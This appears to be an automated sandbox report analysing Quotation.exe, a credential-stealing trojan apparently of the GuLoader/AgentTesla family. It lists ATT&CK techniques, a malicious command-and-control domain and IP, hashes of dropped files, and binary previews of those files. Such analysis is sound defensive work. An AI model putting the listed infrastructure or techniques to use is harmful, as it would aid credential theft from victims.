            Source: Yara matchFile source: 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 1212, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            11
            Input Capture
            225
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS311
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
            Virtualization/Sandbox Evasion
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSH1
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Quotation.exe42%ReversingLabsWin32.Trojan.Guloader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://api.ipify.org/t0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.238
            truefalse
              unknown
              drive.usercontent.google.com
              172.217.16.129
              truefalse
                unknown
                api.ipify.org
                172.67.74.152
                truefalse
                  unknown
                  showpiece.trillennium.biz
                  67.23.226.139
                  truetrue
                    unknown
                    mail.showpiece.trillennium.biz
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://showpiece.trillennium.bizQuotation.exe, 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://drive.usercontent.google.com/(Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://www.google.comQuotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://api.ipify.orgQuotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://r11.o.lencr.org0#Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://mail.showpiece.trillennium.bizQuotation.exe, 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://drive.google.com/Quotation.exe, 00000005.00000002.2601745635.0000000005C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://x1.c.lencr.org/0Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://x1.i.lencr.org/0Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624894201.0000000038B5E000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://x1.c.lencrTQuotation.exe, 00000005.00000002.2624894201.0000000038B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://apis.google.comQuotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://nsis.sf.net/NSIS_Error...Quotation.exefalse
                                      unknown
                                      https://api.ipify.org/tQuotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://r11.i.lencr.org/0Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://drive.usercontent.google.com/5Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          67.23.226.139
                                          showpiece.trillennium.bizUnited States
                                          33182DIMENOCUStrue
                                          172.217.16.129
                                          drive.usercontent.google.comUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.238
                                          drive.google.comUnited States
                                          15169GOOGLEUSfalse
                                          172.67.74.152
                                          api.ipify.orgUnited States
                                          13335CLOUDFLARENETUSfalse
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1545944
                                          Start date and time:2024-10-31 10:43:12 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 12s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Quotation.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@3/12@4/4
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 85%
                                          • Number of executed functions: 137
                                          • Number of non-executed functions: 17
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Quotation.exe
                                          TimeTypeDescription
                                          05:45:26API Interceptor8818x Sleep call for process: Quotation.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          67.23.226.139Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                                            PI 22_8_2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              COTIZACION 19 08 24.exeGet hashmaliciousAgentTeslaBrowse
                                                pago.exeGet hashmaliciousAgentTeslaBrowse
                                                  invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                    SijLVTsunN.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      DHL BILL OF LANDING SHIPPING INVOICE DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                        PO#86637 copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          hI1ho6jgmf.exeGet hashmaliciousAgentTeslaBrowse
                                                            Revised PI_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                              172.67.74.15267065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                              • api.ipify.org/
                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                              • api.ipify.org/
                                                              y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                              • api.ipify.org/
                                                              Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                              • api.ipify.org/
                                                              2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              api.ipify.orghttps://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                              • 104.26.13.205
                                                              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.26.12.205
                                                              https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.26.12.205
                                                              SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              Biocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 104.26.13.205
                                                              skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                              • 104.26.13.205
                                                              Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.26.12.205
                                                              z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                              • 172.67.74.152
                                                              Purchase Order PO61000016222.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              DIMENOCUShttps://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brGet hashmaliciousHTMLPhisherBrowse
                                                              • 107.161.183.172
                                                              http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                              • 107.161.183.172
                                                              nklarm7.elfGet hashmaliciousUnknownBrowse
                                                              • 109.73.163.173
                                                              rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 138.128.178.242
                                                              bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 98.142.105.97
                                                              https://docsend.com/view/63jvhxyyj7pwxergGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 64.37.50.172
                                                              RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                              • 199.168.186.114
                                                              http://usaf.gov.ssGet hashmaliciousUnknownBrowse
                                                              • 198.136.48.242
                                                              https://svsjie.us9.list-manage.com/track/click?u=65baddd8dc4a29452f1a28eb2&id=dde4f4d149&e=6d04ecfe32Get hashmaliciousUnknownBrowse
                                                              • 184.171.250.122
                                                              OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                              • 138.128.164.66
                                                              CLOUDFLARENETUS.gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              pedido.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Proposal From SIOLI Alexander Pino#U2026.pdfGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              PRESUPUESTO DE NOVIEMBRE...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              .gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                              • 172.67.142.245
                                                              Gun Ici Cek Statu Listesi.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.97.3
                                                              http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 188.114.97.3
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0ePRESUPUESTO DE NOVIEMBRE...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 172.67.74.152
                                                              PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 172.67.74.152
                                                              Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 172.67.74.152
                                                              I43xo3KKfS.exeGet hashmaliciousStealcBrowse
                                                              • 172.67.74.152
                                                              http://luckywinsweep.com/4tTAnN1826Wdfo84jjvakjqbux636KVMMHSLZEESXXFW54756LTNO308c9Get hashmaliciousPhisherBrowse
                                                              • 172.67.74.152
                                                              http://luckywinsweep.com/4HSvRF1826gInt84duwrkafbng636FPJGMZWGTSQLQDN54756JUOR308k9Get hashmaliciousPhisherBrowse
                                                              • 172.67.74.152
                                                              segura.vbsGet hashmaliciousRemcosBrowse
                                                              • 172.67.74.152
                                                              asegurar.vbsGet hashmaliciousRemcosBrowse
                                                              • 172.67.74.152
                                                              nOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.74.152
                                                              file.exeGet hashmaliciousStealcBrowse
                                                              • 172.67.74.152
                                                              37f463bf4616ecd445d4a1937da06e19nOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              b4s45TboUL.exeGet hashmaliciousStealc, VidarBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              Justificante de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              Ppto.24265.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              Stadigheder43.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.238
                                                              • 172.217.16.129
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dllrPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  gHQQfMh4F3.exeGet hashmaliciousGuLoaderBrowse
                                                                    gHQQfMh4F3.exeGet hashmaliciousGuLoaderBrowse
                                                                      N874xsydiD.exeGet hashmaliciousGuLoaderBrowse
                                                                        Zeskanowana lista przedmiot#U00f3w nr 84329.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          Zeskanowana lista przedmiot#U00f3w nr 84329.vbsGet hashmaliciousGuLoaderBrowse
                                                                            mbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
                                                                              mbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
                                                                                mydreamudpate.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):5.97694153396788
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                  MD5:D6F54D2CEFDF58836805796F55BFC846
                                                                                  SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                                                                                  SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                                                                                  SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: rPO-000172483.exe, Detection: malicious, Browse
                                                                                  • Filename: rPO-000172483.exe, Detection: malicious, Browse
                                                                                  • Filename: gHQQfMh4F3.exe, Detection: malicious, Browse
                                                                                  • Filename: gHQQfMh4F3.exe, Detection: malicious, Browse
                                                                                  • Filename: N874xsydiD.exe, Detection: malicious, Browse
                                                                                  • Filename: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs, Detection: malicious, Browse
                                                                                  • Filename: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs, Detection: malicious, Browse
                                                                                  • Filename: mbdcKkZ3Ag.exe, Detection: malicious, Browse
                                                                                  • Filename: mbdcKkZ3Ag.exe, Detection: malicious, Browse
                                                                                  • Filename: mydreamudpate.hta, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35
                                                                                  Entropy (8bit):4.264578373902383
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:apWPWPjNLCNHiy:UPRCNHiy
                                                                                  MD5:58AC0B5E1D49D0EE1AED2FE13FAE6C7A
                                                                                  SHA1:02C8384573D47CA39F2E2ACA32B275861EC59A93
                                                                                  SHA-256:624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
                                                                                  SHA-512:8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:[broadspread]..slyngvrk=houghband..
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):482519
                                                                                  Entropy (8bit):1.2446382063037653
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
                                                                                  MD5:1D099F6122F4B7C8A78925726B59E5C3
                                                                                  SHA1:EEA154E31FF04CD1A2CED0193F7633ED219CFA47
                                                                                  SHA-256:1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
                                                                                  SHA-512:F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:GTA audio index data (SDT)
                                                                                  Category:dropped
                                                                                  Size (bytes):379208
                                                                                  Entropy (8bit):7.6144189340710176
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:+Ojg9/+8Uw+Txop1slWP/FAYiCHdj+1m9MLvZsq2IOz:16WzTxopkKAHC9j+Q9kuz
                                                                                  MD5:7C3E64A3E8123691A49FE787A50FC916
                                                                                  SHA1:ABD13A7497B522741F727E0172A8BC839DB18C93
                                                                                  SHA-256:51312E2DDEFCCABC4C8C96A229637B5F247FB1000FECEDBF6FD6EAD54843870B
                                                                                  SHA-512:87D464C7A1EFF82650FAB62F0E8F0444A6A9504DD53151F607705D1F3A9FEDC00B76A201902DDE27D79474DC763E42E6815BABA6A763F7E23B11D5EF4375015F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:....................==.....PPPPPP.L....YYYYY..jj.................................."...........55...........s..&.....VV............v......T..............###........W.RR...y.R.....AAAAA..........................|.y...........\......%..I.....bbbb............C..f.r.5.+..5...*...qJ6p..v9h..T].`{.o.7:2J......"........"B...l....'kZ.H..Ku.>.8....?!{).I~......f....6...]...-...Nm...\DG?W./R.($sAO&.0.d,.a4x.VU........X..~.M...k..4YL..z.....fj...~!.....E......^<_.y1...w...}.... .f....j..8g#..U.@.Qe....;. =)cs.%,[.r.P..nR.........F......C.i.....u.....?3...M...t.hb..5...*...qJ6p..v9h..T].`{.o.7:2J......"4B...l...z.P.f.b..q.q....'kZ.H..Ku.>.8....?!{).I~.......b....*...-...Nm...\DG?W./R.($sAO&.0.d,.a4x.VU...........6.....X.YL..z.....fj...~!.....E......^<_.y1...w...}..M.-b..f.j..C......g#..U.@.Qe....;. =)cs.%,[.r.P..nR.........F......C.i...3...!..r....'...t.hb..5...*...qJ6p..v9h..T].`{.o........#:2J......"4B...l....'kZ.H..Ku.>.8....),.......?!{).I~....]...-...Nm...f....f
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):151886
                                                                                  Entropy (8bit):4.598995683173564
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Gxab7YwMXTp0UgPWnDziLbHyFC/cx6pTeH6gObSzRy20KDfC3wInFTlLBmsYY6aH:xUw8iUgPsHoDu6pTek20EUnVlLksHt
                                                                                  MD5:7FC876F12112A1459C701AE1812AC3A4
                                                                                  SHA1:BF3ACAB93654D132BB2D62C844D888231AB17DF4
                                                                                  SHA-256:9F9AD7DDDA58AAC8054D9A28ECE3956741834E725611C130DB15139C4DFFD1FA
                                                                                  SHA-512:E210B9DDC6C8699EA5CFA4E3B13348F17693BED48B1244327775C335AB325A604DD78DB7B358051C84B562463F39A66FB1CC654FF3E0C8E0A8161C8D5665DFFB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:. .....................(......KKK..............DD....l.).......................O.aa...........$.........J...................I.....NN...........R..q......,,................\........................................H.........................ii.................x.sss.......))....x...44....pp..nn.2.................SSSS....YY....:.OO....0...J.....r.......Y.ZZ.........9...f.SSSSSS...................................................[.........g...==...........^^^^^^^^.r..............T..;....................................................~~~..hh.HH...............qqqqq............333..8.........--.........y.............l...................X......%................kkk.............[.^^^^...........WW......................BBB......GG..............p..............\...........F...]..............P.........zz......n...UUUUUU.......tt..............x.....111..................JJ..........CC...<<<<<<<<.......................d....33333..........T.A....II.........................................................
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):288955
                                                                                  Entropy (8bit):1.2577770955280814
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
                                                                                  MD5:0B62328C4966F6B879B3C13B7FBD9C0D
                                                                                  SHA1:6DD81F12E739E81E06778067513ED1178A06AFC9
                                                                                  SHA-256:645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
                                                                                  SHA-512:2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................|............................................................[.................................................\.......................v...........o...................................m...........
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):340974
                                                                                  Entropy (8bit):1.254605943274635
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
                                                                                  MD5:49BE0E06F2E4F0CCFFB46426EE262642
                                                                                  SHA1:FF9C56C31A824E4CA087705C23D01D288FE34239
                                                                                  SHA-256:A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
                                                                                  SHA-512:27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
                                                                                  Malicious:false
